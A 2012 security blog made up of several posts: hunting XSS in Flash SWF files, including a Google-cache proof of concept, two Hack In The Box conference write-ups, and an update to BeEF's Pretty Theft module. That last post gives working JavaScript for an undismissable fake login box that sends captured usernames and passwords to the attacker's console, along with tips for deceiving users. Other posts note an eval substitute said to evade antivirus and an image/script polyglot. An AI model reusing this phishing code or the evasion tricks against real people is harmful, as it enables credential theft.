Saturday 27 October 2012

XSS using a Flash SWF + Google XSS

Recently I've been brushing up on my XSS. One interesting example I came across used Flash SWF files to perform XSS:

This type of attack has been around for years, I'd never played with it myself so decided to look into it further. First up, what is an SWF? From Wikipedia:

SWF is an Adobe Flash file format used for multimedia, vector graphics and ActionScript. SWF files can contain animations or applets of varying degrees of interactivity and function.

If these files can contain ActionScript, then that means there's going to be input/output and potential vulnerabilities! And for media/graphics teams and companies whose focus is producing content security is really not going to be a priority. Good news for us but bad news for anyone hosting SWFs.

For an introduction to exploiting SWFs check out the OWASP site:

The cool thing with these files is they can be decompiled with relative ease allowing you to perform static analysis. By locating the input variables and the functions that use these variables you can sometimes spot potential vulnerabilities.

So first up you need a decompiler, I found ASdec to be quick and effective, SWFScan is also a good choice especially because it has a built in vulnerability scanner which can speed things up.



Next find yourself an SWF. The easiest way is to Google "filetype:swf", open any link and in Chrome go to Options -> Save Page As. Now you can open the SWF in ASdec, SWFscan, or both, I found ASdec easier to follow, but as already mentioned the vulnerability scanning feature of SWFscan is pretty handy. So to start off I'd run a quick scan in SWFscan (the Analyze button). If you get lucky you might find a potential XSS/CSRF. Take a look at the "Source" tab, this should have the vulnerable code highlighted.

There are two things you should try to look for, the first is input variables or undeclared global variables, these are denoted by _global, _root or _level0. These are variables we may be able to control and potentially use to exploit the SWF. The second thing to look for are interesting functions that use these variables. The OWASP site has a good list of functions to look out for:

XML.load ( 'url' )
LoadVars.load ( 'url' ) 
Sound.loadSound( 'url' , isStreaming ); 'url' );

Next you'll need to verify how the variable is being used and if it's actually possible to take control of the function. Sometimes you won't be able to control the input value or there may be filtering in place. This is where static code analysis comes in. As each SWF is different there is no fixed method for this but I'll cover some examples below.

Example 1 - XML function with filtering (see code below)

In this first example you can see how the program accepts an XML path as input and performs some checking to prevent us from using a remote resource (such as our own malicious xml file!). The legitimate URL was something like We want to change it to, however in this example it's not possible due to input validation.

The first thing to take note of is the call to our input data (path=_root.xmlPath) and it's subsequent use by the XML object (myXML.load(path)). At first glance this looks quite promising. However you'll notice that before myXML.load is performed our path variable is checked using the isDomainEnabled function...

The isDomainEnabled function first checks for the existence of www or http:// (indexOf returns -1 if something doesn't exist). Then checks if our domain is included in the domain list. I've blacked it out to protect the companies identity but the black spots are just, etc. So if we try to call our remote domain we end up stuck in the while loop uh oh!

So how can we get around this filter? Encoding is an obvious choice or how about using just https:// instead of http:// ? :)

Example 2 - Regex filtering

Another example I encountered took in a parameter called swf_id which was later used in an ExternalInterface call. Unfortunately it was not possible to take advantage of because of regex filtering. First the parameter was loaded. For example if our URL is the swf_id parameter was assigned using root.loaderInfo.parameters.swf_id, in this case if nothing is supplied it was left blank. In this example a RegExp object was used to look for any non-alphanumeric character, if one is found it throws an error. This prevents us from including a URL or Javascript in the swf_id parameter :(  

Example 3 - ExternalInterface Call

There's a good example of how unfiltered inputs can be abused using at the below link:

This example is exploitable because of non-existent input validation of parameters sent to this function:, this.elementID, event);

Does anyone actually use vulnerable SWFs?

After doing all this analysis I thought I'd take a look at a few sites to see if they were hosting any vulnerable SWFs as this could lead to XSS/CSRF.

Google was hosting hardly any SWFs so I checked each one in turn. When running one file in particular it had a user interface that listed AutoDemo as it's creator. Googling AutoDemo and XSS I discovered that there was a file called control.swf that is used by AutoDemo files and its vulnerable to XSS. It hadn't shown up in the original search results but it was there and it was exploitable :)

There is one caveat to this story though. The file was not hosted on one of the core Google domains, it's actually hosted on the sand-boxed cache, "googleusercontent". So sadly it wasn't possible to steal any data using XSS. However it would be possible to use this for phishing and as it is based in the Google family it should still be effective at enticing users to click it.

This was the first file I found:

Here's the proof of concept XSS involving the control file."L0LZ G00GLE H4Z XSS!")//

I contacted Google about this issue, they said they didn't regard this as a serious security risk as user data cannot be compromised and the risk of phishing is minimal. For example, there's nothing stopping someone from registering a domain called that would be far more effective for phishing. So should all vulnerabilities found in the Google cache be classified as low risk?

It's an interesting question, does the Google cache offer a unique attack vector? Maybe I'll save this for another blog post ;) If anyone has any ideas or comments feel free to leave a message below.


Saturday 13 October 2012

Hack In The Box 2012 Kuala Lumpur Day Two

So Hack In The Box 2012 is all over. I had an awesome two days, the talks were really enjoyable and it was great talking to the other folks who attended. As promised here is the write-up of day two (with one or two pictures).

List of talks I attended:
  • Why Web Security is Fundamentally Broken by Jeremiah Grossman
  • Innovative Approaches to Exploit Delivery by Saumil Shah
  • XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah
  • IOS panel discussion
  • Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin
  • A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco
  • Element 1337 in the Periodic Table: Pwnium by Chris Evans 

Why Web Security is Fundamentally Broken by Jeremiah Grossman

This talk focused on the fundamental flaws present in the current security model of web technology. Nothing Jeremiah talked about required a vulnerability to exploit, all of these flaws are there by design. Jeremiah started by introducing the two main categories of browser attack:
  • Attacks to escape the browser e.g. browser exploits, java exploits, adobe exploits etc.
  • Attacks from inside the browser sandbox, e.g. XSS, CSRF, clickjacking etc.
He made the point that often there is little users can do to protect themselves and the responsibility to address these flaws lies with the website owners. Next he presented a couple of examples.

img src Login Checker
This one liner tries to retrieve an image from a site on a different domain. If the user is logged in Twitter or Facebook will redirect to the image sending back a HTTP 302 message. If not an error code will be returned. There is a module within Beef that uses this technique to check for gmail, facebook and twitter login status.

<img src="" onload="succesful()" onerror="error()">

Personal Information leakage through Follows and Likes
It's surprising how much information is given away when someone follows or likes something on Twitter or Facebook. With default privacy settings it's possible for the person you follow or the page you like to actually view a selection of your personal information. Facebook and Twitter should really address this issue but this would no doubt piss off big business as data mining these sources would be prevented.

Host Information Leakage
Through browser calls and javascript it's possible to find out information such as browser version, underlying OS, browser plugins, add-ons and extensions (different to plugins). It's possible to brute force their existence by using the extension URLs from the app store.

Possible Solutions
  • To fix login detection - Do not send web visitors cookie data to off-domain destinations.
  • Not possible to fix likes or follows as money-making analytics relies on these features.
  • Ban iframes or transparent iframes. Facebook, gmail and others rely on iframes!
  • Create a barrier between public and private networks filtering particular RFCs. Not possible because business's often have fucked up internet/intranet settings.
  • Ultimately no browser is willing to fix these issues as they might lose users.
  • Instead apply a bandage through opt-in security settings deployed by individual website owners. e.g. Secure cookies, HttpOnly, x-frame-options.

There are three choices either we :
  • Carry on as usual. 
  • Use the new .SECURE tld. 
  • Break the internet, uh oh.
As a final thought Jeremiah looked at the browser model used by mobile apps. Apps are quite often just mini versions of browsers but locked down to a particular site. This is a secure model and something that could be adopted on Desktops.

Innovative Approaches to Exploit Delivery by Saumil Shah

Saumil presented an interesting way to obfuscate javascript by encoding it within an image. He started off by covering traditional obfuscation techniques that usually rely on the eval statement to decode javascript. Although this can prevent manual analysis of code, it doesn't evade dynamic analysis and AV/IDS vendors will often flag an eval statement as suspicious! He gave a quick demo to show how easy it is to place malicious javascript in a tinyurl website and then embed it on another site or share the link through email/social networks.
Saumil then demo'ed an encoder and decoder he had built that would take javascript and convert it to a basic png and back. Neat stuff. However this still used an eval to process the image to extract and run the javascript.

He presented an easy alternative to eval:
  • Flagged by AV:  var a = eval(str);
  • Not-flagged by AV:  var a = (new Function(str))();
Next up he demonstrated how to create an image that is both an image and javascript. Wut?!?! I can't remember exactly how he did this but if you look at the hex of a gif you will see the gif89a header after this there were some width and height bits, apparently you can just stuff javascript after these bits using tags /**my javascript**/ and it will be executed. All you do is embed it in the page with the following:

<img src="a.gif">
<script src="a.gif"></script>

And this worked on all browsers. Next he presented a bmp example, where he had inserted the javascript in the alpha channel section of the image and the original image remained completely in tact.

Combining these techniques he demoed two images one containing the payload another the decoding routine. It was cool seeing this in action and I can imagine it's a nightmare for AV vendors to try and catch this kind of obfuscation.

In his final demo he placed adobe reader exploit code within an image in a pdf and used it to exploit adobe reader.

This talk reminded me a lot of Thor's talk at DefCon "Socialized Data: Using Social Media as a Cyber Mule" where he demoed embedding data in video and images. At the moment I don't think this is something malware authors have really focused on just because they haven't needed to but I'm sure going into the future we'll see more of this stuff in the wild.

XSS & CSRF Strike Back Powered by HTML5 by Shreeraj Shah

I actually saw this talk at BlackHat 2012 but I found Shreeraj went through his material really fast. Unfortunately it was the same time this time round as well :( He essentially took us on a whistlestop tour of HTML5, the modern browser architecture and exactly where the issues lie.

Shreeraj presented a few examples, I'm only going to mention my favourites:

CSRF with XHR and CORS bypass
Before HTML5 cross domain XHR was not possible, however now pages can set CORS headers to allow cross domain. For example when a site sets the access-control-origin header to "any" e.g. "access-control-allow-origin : *"  you can successfully make cross-domain calls. What this means is that if a user were to visit say legitimate site A that happened to contain malicious javascript an attacker would be able to do CSRF or pull data from the user's legitimate site B session.

He demonstrated how a malicious attacker could modify the code of a page to use cross domain resources. For example to replace a login element on the current page with remote data:


Instead of me writing a really poor explanation I'd recommend this link for some great examples of these techniques:

Web Storage
HTML5 brings some really interesting new features such as the ability for web sites to create SQL databases or filesystems in the browser. If the website that's implementing these features contains XSS an attacker can pull all of a users data from these resources. It's cool but unfortunately not possible cross domain.

In Chrome you can view the resources of the site by bringing up the developer console, right click the page and select inspect element. Under the resources tab you will be able to see any locally stored data including session data and cookies.

For more awesome HTML5 hacks it's worth checking out:

IOS Panel Discussion by @Musclenerd, David ‘@planetbeing’ Wang, Cyril ‘@pod2g’ Mark Dowd

I went to see the iOS6 talk on day one and found it a bit tricky to follow as I don't have a lot of experience with iOS or writing kernel exploits. Although this panel discussion focused on similar material it was more high level and not as technical as the previous talk.

Despite the aslr, heap hardening, address space protection and more added by Apple, there's no doubt these will be the guys releasing a jailbreak for the iPhone5 in the coming weeks.

Messing Up the Kids Playground: Eradicating Easy Targets by Fyodor Yarochkin

Fyodor presented a rushed and somewhat unclear talk on ways to detect/catch malware and botnet owners by analysing DNS records.

He started by giving an overview of the Crimeware as a service (CaaS) scene. He described how different groups are generally responsible for different parts of the service. Fundamentally this is a black market economy where there is competition between individuals and just like the real business world it's far more profitable to cooperate with others to get the job done. This has resulted in different groups that each specialise in either malware creation, traffic generation, infrastructure or handling stolen data and each group will sell their services to the highest bidder.

He provided an interesting example of a banner advertising agency in Russia that has managed to escape prosecution because they claimed they had been hacked and there just wasn't enough evidence to achieve a conviction.

Next Fyodor showed two ransomware examples one that been installed locally through a browser exploit and one fake firefox update javascript example running in the browser.

The remainder of the talk was a bit rushed, he talked a bit about how patterns in DNS can be used to detect botnets. Typically the same registrar will be reused and also the same whois information. It is also possible to automate detection of malicious domain names but he didn't go into how to do this.

He mentioned fast flux techniques where malicious domains are rotated very rapidly to evade detection and suggested how this could be done. Apparently a number of registrars offer a returns policy on domains and charge only a small cancellation fee. This allows botnet infrastructure owners to repeatedly change domains for only a small cost. He also talked about how you can try to predict the domains they will use in the future. If you guess correct then you will get bots actually connecting to you, sweet.

A Scientific (But Non Academic) Study of Malware Obfuscation Technologies by Rodrigo Rubira Branco

I only caught the last 20 minutes of this talk and regretted not watching from the start. Rodrigo is head of malware research at Qualys and can best be described as a funny Brazilian guy. In his talk he presented an analysis of anti-debugging and obfuscation techniques used by malware.

I missed the first half of the talk where he described the various anti-debugging techniques used but I was lucky enough to catch the second half where Rodrigo explained how the presence of anti-debugging in malware can actually be used as a way to detect the malware. It's such a simple idea and I'm really surprised (as was Rodrigo) that AV vendors don't use these techniques already.

For more info -

Element 1337 in the Periodic Table: Pwnium by Chris Evans 

The final talk of the day was presented by Chris Evans who is a senior in the Google security team. He started off by handing out a big pile of cash to different researchers for their contributions. Props to Google for supporting the security community.

Chris mentioned how successful the vulnerability disclosure program had been since it's launch and presented some statistics. I was surprised to see that Chrome has contained so many vulnerabilities. I had rather naively assumed Google developers were invincible! Take a look at:  each month a ton of vulnerabilities get reported.

Next he discussed Pinkie Pie's working Chrome exploit. Pinkie's exploit abused a use-after-free vulnerability present in the SVG module to compromise the renderer process within Chrome and a ROP chain to evade ASLR. To escape the Chrome sandbox and access Windows he used specific IPC messages that weren't properly restricted. In other words to escape the sandbox no super fancy exploit was used, just a simple call to the Chrome IPC layer. Chris was face palming live on stage at this point. More info can be found here:

Lock-picking stand:

CTF contest:

It was an awesome two days and hopefully I'll be back next year. If anyone has any comments or questions feel free to post them below.

Pwndizzle over and out.

Thursday 11 October 2012

Hack In The Box 2012 Kuala Lumpur Day One

Hey guys,

This is a quick write-up of my experiences at Hack In The Box 2012 in Kuala Lumpur (day one). For each talk I attended I've tried to include a summary of the main points. Sadly I forgot to take pictures so it's one massive wall of text, sorry! Will try and take some for day 2.

List of talks I attended:

  • Tracking Large Scale Botnets by Jose Nazario
  • Data Mining A Mountain of Vulnerabilities by Chris Wysopal
  • 6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix
  • A Short History of The JavaScript Security Arsenal by Petko Petkov
  • iOS6 Security by Mark Dowd & Tarjei Mandt
  • "I Honorably Assure You: It is Secure”: Hacking in the Far East by Paul Sebastian Ziegler

Tracking Large Scale Botnets by Jose Nazario

Jose's talk focused on the techniques that are used today to measure the size of botnets by tracking down infected machines.

The general aim of his work was to measure the number of bots, in terms of number of infected machines/ip's/people/accounts and ways to classify the bots by type, geographical region and what the bot does (financial, DOS, infrastructure impact). An interesting quote from a colleague was "it can be easy to identify and count the number of infected machines but its impossible to know the total number of machines (clean and infected) on the internet today". This makes it difficult to really gauge the scale of the problem. He also noted that the resources of security teams are limited and should be carefully prioritized.

Next Jose talked about the actual methods used to track botnets:
  • Sinkholes - Redirect CnC traffic to your server using DNS injection, P2P injection, route redirection. Count unique ip's connecting per day. Once redirected, you can send updates and commands to the bots (e.g. removal command) however usually this isn't done for legal reasons. Sometimes its not possible to directly interact with the bots as they sign updates or have other protections (e.g. encryption). There are two major advantages to using sinkholes. Once you have redirected CnC traffic you (i) effectively lock out the botnet herder (ii) can find out who is infected.
  • Traffic logs - If you can monitor traffic logs botnet traffic requests often contain a unique identifier. For example in conficker there was a "q" value that acted as an identifier.
  • Darknet monitoring - Monitor traffic destined for unused IPv4 address space blocks. It is possible to detect scanning from infected machines targeting the unused IPv4 regions.
  • URL Shorteners - Short urls are commonly used to spread malware (e.g. tinyurl, It is possible to analyse the characteristics of users who have clicked known bad links. For example using url shortener you can view usage statistics of who clicked the link e.g. OS, Browser etc.
  • Direct Network Access - Possible to directly monitor network traffic .e.g. ISP.
  • Direct Host Access - Microsoft is in best position as it can directly interact with Windows hosts, can count incidents from Windows Defender. Data currently not publicly available.
  • Direct P2P enumeration - Crawl the botnet, asks peers who they know. Gather full list. Need to reverse protocol, can be difficult to break crypto. 
Jose noted that you can't always see all of the bots due to poor network visibility, traffic redirection by ISPs, DNS blacklists or offline hosts. It is possible to sometimes over/under count the number of infected machines because of DHCP (as devices change IP the same device might appear multiple times), NAT (Can really mess up estimates, e.g. Blaster worm in 2003 - Arbor estimated 800,000 where as Microsoft 8,000,000), Opt-out (if a user disables updates or reporting).

Data Mining A Mountain of Vulnerabilities by Chris Wysopal

Chris works for Veracode where he focuses on secure code review. He presented findings from a comprehensive study of the vulnerabilities found in 9910 commercial and government applications (using static and dynamic analysis). He had correlated the vulnerabilities with the metadata of the applications (e.g. type of application, size, origin, language used) to find meaningful statistics.
  • Most applications were internally developed 75%, 15% were commercial applications, 10% open source - 50% were built with java, 25% with .net.   
Comparing OWASP statistics with the 9910 applications analysed:
  • SQL injection was used in 20% of all attacks when 32% apps were vulnerable.
  • XSS was used in only 10% of attacks when 68% apps were vulnerable.
  • Information leakage was used in only 3% of attacks but 66% of apps were vulnerable. 
XSS appears massively under targeted. Next, comparing languages:
  • In Java, Coldfusion, .NET and PHP applications, XSS is the most common vulnerability. 
  • However when Adobe added a language level fix for XSS this helped fix the issue somewhat. 
  • C++ applications had completely different vulnerabilties e.g. buffer overflows, error handling. 
  • PHP had a lot of SQL injection and directory traversal issues, way more than Java and .net.
Language choice matters a lot! Comparing how vulnerabilities have changed over time.
  • The number of XSS vulnerabilities has remained steady over the last 2 years. Indicating it's not being exploited as much as other vulnerabilities and hence not being fixed.
  • The number of SQL injection vulnerabilities has decreased over the last 2 years. Most likely due to the publicity SQL injection has received.
  • Overall 86% of applications contain at least one vulnerability from the OWASP Top 10.

Industries and business:
  • Which industries are getting their code externally tested? 
  • Finance, Software makers, Tech. 
  • Utilities is one of the worse performing. (but what about all that critical infrastructure?!?! uh oh.)
  • Which industry is most secure? 
  • Finance is most secure. 
  • Surprisingly security products themselves were most insecure!
  • Does size of company matter?
  • No difference in number of vulnerabilities between public and private companies.
  • No difference in number of vulnerabilities by company revenue.
  • The bottom-line - Company size and revenue don't effect the quality of code!

Regarding vulnerabilities in mobile apps, the major differences here were related to the language chosen. As Android is Java based there is more XSS/SQLi where as iOS apps are written in objective C so have buffer management errors, directory traversal, not found in Java. However iOS apps are signed so are safer overall!

Chris finally talked about the software developers and how they are ultimately responsible for the quality of code. He presented a statistic that on average half of all developers don't understand security. When put like this it seems fairly obvious why there are so many security flaws in modern applications. More security awareness seems to be the answer.

6000 Ways And More - A 15 Year Perspective on Why Telcos Keep Getting Hacked by Philippe Langlois & Emmanuel Gadaix

This was an interesting talk, unfortunately I don't have a lot of experience with telco backbone infrastructure or protocols so found a lot of the presentation tricky to understand. One thing was clear though - telco's have a ton of serious security flaws.

The main issues are:
  • Currently operators are focused on availability, fraud, it security, interception, spam.
  • There are few experts in the field of telco security.
  • The walled garden approach and a rigid industry dominated by big players.
  • Scary how easy attacks are and they are happening behind closed doors.
Like a lot of other industries they try to rely on security through obscurity and have a reactive as opposed to proactive approach to security. Hopefully things will change with the the buzz around cyberwar and the importance of national infrastructure.

A Short History of The JavaScript Security Arsenal by Petko Petkov

This was by far my favourite talk of the day. Petko started by giving a quick history of browser technology and common attack methodologies today. At the moment there are two main choices, Beef can be used for XSS/javascript attacks or Metasploit can be used to target vulnerabilities within the browser itself. Both have limitations and with browsers becoming a lot more secure new techniques are needed.

Three evils plans (attack vectors) were presented:
  • Use the victim to attack other web targets.
  • Use the victim to attack internal resources.
  • Use the victim to attack others through social networks.
  • Bonus plan - Use the victim's browser to compromise the underlying system.

He described how his tools have evolved and referenced the below specifically:

JSPortScanner -> AttackAPI -> WebSecurify Suite -> Weaponry

One of the major limitations is that it's difficult to port classic security tools from C, ruby etc. to javascript to be able to use them in browser. Weaponry is intended as a way to address this issue. By creating a custom cross compiler it would be possible to convert your favourite programs to javascript and use them actually in the browser. (At least this is what I thought he was saying)

Petko demo'ed a browser extension for chrome and firefox that had a range of attack functionality built in. This would allow a remote attack to use the persons browser as a pivot. I was particularly impressed by how light the extension seemed to be and how quickly it performed scans and analysed data. It really was a step up from Beef. Oh and the UI was really sexy.

The one area I asked Petko about was initial compromise which is something he didn't really explain. For a malicious attacker to use these techniques the target would need to install the malicious browser extension. While not as likely to succeed as say Beef, you only need to look at the prevailance of malicious apps to understand that people would be more than stupid enough to install this kind of application if packaged correctly.

Overall I was really impressed. I spoke to Petko at the end and he said that the project will be open source but is currently still under construction.

iOS6 Security by Mark Dowd & Tarjei Mandt

I was originally going to see a talk by the founders of the pirate bay but they apparently got detained in Bangkok and so couldn't make it to the conference. Instead I headed over to the iOS6 talk hoping to learn something new.

This was quite a technical talk digging into the new anti-jail-breaking protections (stack cookies, ASLR, Heap protections) put in place by Apple in iOS6. Having only limited experience with exploit design and next to no experience with the internals of iOS I did struggle to follow the talk. I gotta say though how impressed I was at the way these guys picked apart iOS with such ease. With everything these guys understood it was hardly surprising seeing them produce such a complex jailbreak (again!). All I kept thinking was "Why hasn't Apple hired these guys?".

"I Honorably Assure You: It is Secure”: Hacking in the Far East by Paul Sebastian Ziegler

In the final presentation of the day Paul talked about his experiences with IT security (and life in general) in Japan and South Korea. Having lived in Japan myself I was interested to find out how different or similar his experiences were to mine.

He started by talking about the god-like status given to white foreigners in Japan and how this can be used to do social engineering. He suggested foreigners could be broken down into three categories military, English teachers and business men and out of those categories the business man commands the most respect and so is perfect for social engineering. And all that is needed is a suit, magically once the suit is on you become immune to everything.

And in emergencies (when the suit doesn't work) just play the dumb foreigner card. Having done this myself I can confirm this is a very useful strategy!

He went on to talk about the prevalance of open wireless networks and use of WEP in Japan and how open networks are everywhere is South Korea. Then talked about SEED which is a government alternative to SSL that is deployed everywhere in South Korea. This has a knock on effect where users are forced to use legacy browsers as SEED doesn't support modern browsers. With users migrating from Windows XP to Windows 7 they have been forced to install IE6 on Windows 7 in order to use SEED websites. IE6 use was always high in South Korea because of seed but recently its actually been increasing! crazy eh.

Day two will be up tomorrow.



Tuesday 2 October 2012

Update to the Pretty Theft (phishing) module in BeEF

Hi all,

Today I'm going to be talking a bit more about BeEF and specifically the Pretty Theft module.

For those of you who don't know, BeEF (the browser exploitation framework) is a tool that cleverly uses the browser's built in functionality, javascript and other third party software against the user. What's interesting is that it doesn't rely on any exploit (although this is also possible) to get the job done, so even if you are fully patched, you can still be attacked using beef.

Initial compromise of the user's browser usually relies on either XSS, luring the user to your own website containing malicious javascript or MITM injection of javascript. Once a user runs the beef hook javascript their browser silently connects back to the beef admin and you can deploy any of the 125 beef modules.

Beef is included with Backtrack but you probably want to do a git clone to get the latest version (see previous post!). For more info the beef site is here:

So what is the Pretty Theft module?

The pretty theft module is a phishing module that uses floating divs to create legitimate looking fake login boxes that are displayed in the browser. It was originally created by Nickosaurus Hax ( I really liked the idea of the module but it was quite basic, there was only one default pop up and it looked really fake. To make the module more effective I decided to try and add some additional pop up boxes with different styles.

The original pretty theft dialog box:

To start with I wanted to create a Facebook pop up, a LinkedIn pop up and also to update some of the module logic.

How does Pretty Theft work?

The module starts by creating a semi transparent grey background that covers the whole page, this prevents the user from interacting with the page and forces them to confront the pop up box.

(Code slightly edited for blog)

//Define properties
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');

//Build layer and position
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the dark layer.'absolute'; // Position absolutely'0px'; // In the top'0px'; // Left corner of the page'hidden'; // Try to avoid making scroll bars'none'; // Start out Hidden'darkenScreenObject'; // Name it so we can find it later
dark=document.getElementById('darkenScreenObject'); // Get the object.

//Assign style properties;;'alpha(opacity='+opacity+')';;; pageWidth; pageHeight;'block';

Next a separate div is created to simulate a pop up window, the style and positioning is defined and it is appended to the page.

// Generic floating div with image
function generic() {
sneakydiv = document.createElement('div');
sneakydiv.setAttribute('id', 'popup');
sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:30%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
sneakydiv.setAttribute('align', 'center');

sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"buttonpress\").value=\"true\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"buttonpress\").value=\"true\";\' value=\'Ok\'><br/><input type="hidden" id="buttonpress" name="buttonpress" value="false"/>';

// Repeatedly check if button has been pressed
credgrabber = setInterval(checker,1000);


Once the ok button is pressed a hidden variable is set to true. The checker function is called every second and will verify that the button has been pressed and the input boxes contain some data. If everything checks out the data is sent to the beef admin and the divs are removed from the page, leaving the user to carry on browsing happily. If the user didn't enter any data they are prompted with an alert and sent back to the dialog box.

function checker(){
uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;

if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
// Join user/pass and send to attacker
answer = uname1+":"+pass1'<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
// Set lastchild invisible
// Lighten screen

}else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
// If user has not entered any data reset button
document.body.lastChild.getElementsByTagName("input")[3].value = "false";
alert("Please enter a valid username and password.");

What sneaky tricks do you use to fool the user?

I'd say the most important aspect of effective phishing or social engineering of any kind is being convincing. By making your malicious activity as realistic as possible the user will assume its perfectly normal and happily go along with it.

To achieve this I focused on getting as close as I could to the real styles used by Facebook and LinkedIn. I used a combination of info from web/forums/blogs etc. and also inspection of the actual website code, using the built in Google Developer Tools. In Chrome you just right click any page element and select "Inspect element" and bam you get the code. Super useful for borrowing code and styles.

The second aspect I focused on was the module logic and how the user interacted with the dialog box. Most legitimate dialog boxes give you two choices, continue or cancel. To ensure the user interacted with the div I only had a continue box. I didn't add a cancel button or any other way to close the box for example a cross in the top right hand corner. This forces the user to confront the box and enter credentials. Another design choice was the verification of user input data. I added a check to ensure that the user has entered a username and password, if either is missing an alert box is used to prompt them to enter valid data. Every little bit helps when trying to scam that end user :)

Final Product: Real vs Fake

A real Facebook message box:

My fake Facebook dialog box:


If I get some time I'd like to improve the appearance of the pop ups, add more pop ups and clean up the code a bit. IE6 is not supported at the moment, it flat out refused to layer the divs. Border opacity was something I didn't end up finishing as the child elements were inheriting the opacity creating semi visible pop up boxes. I just needed to create a seperate div for it but there were some positioning issues. Definitely something that can be fixed, I was just too lazy :)

The beef framework brilliantly demonstrates how lethal even the smallest bit of javascript can be and how important it is to use NoScript. Through modules like Pretty Theft it's really easy to demonstrate the kinds of the attacks organisations are facing today and how to best defend against them. If you've not played with BeEF before I suggest you go grab a copy. If you are using Backtrack, to make it work you first need to grab the latest edition and then install bundler within the beef directory. Commands are below:

rm -rf /pentest/web/beef && git clone /pentest/web/beef

gem install --user-install bundler

As usual if you have any suggestions or questions feel free to comment below.